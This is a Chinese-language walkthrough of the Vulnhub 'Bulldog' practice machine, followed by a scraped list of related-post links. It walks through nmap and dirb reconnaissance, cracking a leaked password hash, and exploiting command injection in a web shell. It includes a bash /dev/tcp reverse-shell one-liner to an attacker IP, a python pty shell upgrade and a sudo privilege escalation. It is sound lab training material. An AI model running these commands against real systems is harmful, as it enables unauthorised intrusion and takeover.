1.nmap扫描存活主机,找到靶机(192.168.34.160)
2.nmap -sV -p0-65535 -T4扫描开放端口

80端口和8080端口一样,
3.用dirb扫描一下

访问/dev 下面有个web-shell进去以后需要登陆
打开源码邮件后面都有MD5加密后的字符串,解密ddf45997a7e18a25ad5f5cf222da64814dd060d5为bulldog,账号为nick
在ip/admin下登陆,再去web-shell下就可以执行命令了
我们发现可以有&,有命令执行漏洞,反弹shell

echo “bash -i >& /dev/tcp/192.168.34.189/6666 0>&1″ | bash
4.
Cat /etc/passwd发现一个bulldogadmin
在/hmoe下有一个bulldadogdmin目录,进去bulldogadmin里面,输入ls -al
会显示隐藏目录

发现有一个.hiddenadmindirectory,进去

继续查看customPermissionapp的内容
是一堆乱码,用strings查看

有一段是SUPERultimatePASSWORDyouCANTget,是密码
输入su提示必须是终端
用python -c ‘import pty;pty.spawn(“/bin/bash”)’,然后sudo su -输入密码提权成功

bulldog-vulnhub相关推荐

  1. 靶机渗透【bulldog】

    文章目录 *一. bulldog靶机安装* 1. 下载bulldog 2. 开启bulldog *二. bulldog靶机渗透* 1. 信息收集 2. Web渗透 3. 命令注入&nc反弹sh ...

  2. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

  3. [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)

    这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...

  4. vulnhub bulldog

    配置环境 bulldog需要在virtualbox虚拟机下运行,导入后,网卡选择仅主机模式,打开后会自动出现ip ip:192.168.56.101 点开vmware中的虚拟选项编辑器中 点击更改设置 ...

  5. 【Bulldog】靶场记录

    前言: 漏洞复现有点乏味并且时效性不强,所以我就开始下载vulnhub上的靶场进行练习,但是操作自己是了解的,就是想不到这种方法,还是靶场练习的太少了,所以本人要坚持练习靶场,然后把练习过程记录下来, ...

  6. vulnhub——Bulldog1

    攻击机:kali linux 目标靶机:Bulldog1(可在vulnhub中搜索下载) 目录 壹 信息收集 one 查看kali的IP地址 ​two 主机发现 three 端口扫描 贰 渗透测试 o ...

  7. vulnhub靶场,bulldog1

    vulnhub靶场,bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128 ...

  8. bulldog靶机练习思路详解

    下载靶机,在虚拟机中打开 下载地址:https://download.vulnhub.com/bulldog/bulldog.ova 主机扫描nmap,发现目标主机与其开放的端口 在浏览器打开网站,只 ...

  9. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  10. (Vulnhub练习)--Bulldog1渗透实战

    (Vulnhub练习)–Bulldog1渗透实战 下载地址 http://www.vulnhub.com/entry/bulldog-1,211/ 文章转载 靶机渗透测试实战(三)--Bulldog1 ...

最新文章

  1. Android数据存储(三)——SQLite
  2. html5动态气泡效果6,[jQuery]Canvas气泡动态背景效果
  3. Python内置方法大全
  4. 在python中、列表中的元素可以是_在Python中存储一个列表的元素,在另一个列表中 – 通过引用?...
  5. 如何在anaconda环境下安装tensorflow/pytorch/keras等
  6. java基础将字符串进行反转
  7. linux 类似winscp_联合使用winscp和putty管理你的linux远程机器
  8. 合作 | 2018数博会AI全球赛项目征集!提供场景、数据集,总奖金池500万
  9. [C语言]函数与调试
  10. 前端cookie 放到请求头_ajax请求头cookie问题
  11. 面试心得1之STAR法则
  12. GRYZ 模 拟 赛 系 列 Xxy 的车厢调度
  13. 基于vue实现网页直播推流(不能落地,仅作记录)
  14. 24点小游戏(C语言实现)
  15. 基于springboot特色农产品电商平台毕业设计-附源码211515
  16. 可以DIY装修的商城系统,你也能拥有
  17. python 三个点‘...’、Ellipsis符号
  18. Event Sourcing和CQRS实现
  19. 聊一聊KOA的洋葱模型
  20. JAVA第10课:标识符的定义及规则

热门文章

  1. C语言规定 在一个源程序中 main函数,C语言规定:在一个源程序中,main函数的位置()A.必须在程序的最开始B.必须在系统调用的库函数的_搜题易...
  2. 训练深度学习网络时候,出现Nan是什么原因,怎么才能避免?(转)
  3. mfc显示html单元格,HTML/CSS中可直接输数据的表格
  4. 20189216 2018-2019-2 《密码与安全新技术专题》第二次作业
  5. 关于高精度地图定义的探讨
  6. 高德地图 java_几行代码实现高德地图的高级用法
  7. 2019_WSDM_Social Attentional Memory Network Modeling Aspect- and Friend-level Differences in Recomme
  8. 【知识点】分布式系统相关名词/概念/知识点
  9. 安卓开发拍照时闪退遇到问题: file:///storage/emulated/0/0.jpg exposed beyond app through ClipData.Item.getUri()
  10. NetBackup 8.2 LinuxR Oracle脚本备份